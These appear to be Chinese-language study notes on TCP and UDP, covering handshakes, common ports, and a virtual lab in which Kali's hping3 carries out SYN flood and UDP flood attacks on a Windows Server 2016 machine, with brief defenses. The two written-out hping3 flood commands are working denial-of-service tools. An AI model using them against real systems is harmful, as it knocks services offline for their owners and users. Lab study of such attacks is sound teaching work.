传输层协议 1.TCP 2.UDP
传输层协议
1.TCP
2.UDP
TCP协议
回顾内容
- 传输层功能:定义应用层协议数据报文的端口号,流量控制
- 对原始数据进行分段处理
传输层所提供服务
- 传输连接服务
- 数据传输服务:流量控制、差错控制、序列控制
一、传输层的TCP协议
1.面向连接的传输协议
- 要求数据在传输以前必须建立连接,数据传输后,必须释放连接
- 仅支持单播传输,在两个终端之间建立的点对点连接
2.UDP用户数据报协议
二、TCP报文字段
字段含义:TCP报文格式详解,图解超详细!
【计算机网络】TCP协议——1.报文格式详解_tcp报文-CSDN博客
1.建立三次握手
2.TCP释放连接的四次挥手
3.TCP半关闭状态
4.TCP半连接状态
会产生SYN flood,属于DoS的一种。
5.常见TCP端口号
- 21 FTP
- 22 SSH
- 23 TELNET
- 25 SMTP
- 53 DNS
- 80 HTTP
- 110 POP3
- 143 IMAP4
- 443 HTTPS
- 3306 MYSQL
- 3389 RDP
三、实施SYN flood
实施:
- 在kali上使用hping3工具
防御:
- 使用TCP代理(防火墙),比如10G的带宽,需要很多个w
- TCP源探测,防火墙开启该功能,下一代防火墙
1.GNS3中
-
安装好GNS3之后,进行配置
#进入路由器中
2.kali中
输入:进入vim
#在kali中,将网段设置成VMnet1
vim /etc/...
#按下A键
#写入
auto eth0
iface eth0 inet static
address 192.168.1.50
netmask 255.255.255.0
gateway 192.168.1.254
#写完后按下esc键,:
:wq! #保存并退出ifdown eth0 #关闭网口
ifup eth0 #打开网口
ifconfig #查看kali的IP地址
route -n #查看路由表
#在Windows server 2016中,将网络设置为VMnet8
#W配置IP地址
#进入cmd
netsh interface ip set address "Ethernet0" static 192.168.2.100 255.255.255.0 192.168.2.254
ipconfig
#在kali中实施攻击
hping -c 1000 -d 200 -S -w 64 -p 80 --flood --rand-source 192.168.2.100
四、Windows Server 2016搭建网站
- 打开服务器管理器
- 管理
- 添加角色和功能
- 下一步,下一步
- 服务器选择:下一步
- 勾选web服务器,添加功能,下一步
- 一直下一步,直到安装
五、安装GNS3
超详细GNS3安装和使用教程,避免各种报错 - ghbuff - 博客园
【CCNP | 网络模拟器GNS系列】安装、配置和使用 GNS3_gns3的安装步骤及导入路由器镜像的过程-CSDN博客
UDP协议
UDP(用户数据报)协议,是传输层的另外一个协议
一、简单概念
1、特点
不需要建立连接,直接发送数据,不会去重新排序,不需要确认
2、报文字段
- 源端口
- 目标端口
- UDP长度
- UDP校验和
3、常见的UDP端口号
- 53 DNS
- 69 TFTP
- 111 RPC
- 123 NTP
- 161 SNMP
二、实施UDP Flood攻击
配置路由器IP
在Windows中
netstat -anop udp
开启53号端口
在kali中实施攻击
hping3 -q -n --rand-source --udp -p 53 --flood 192.168.2.100 -d 10000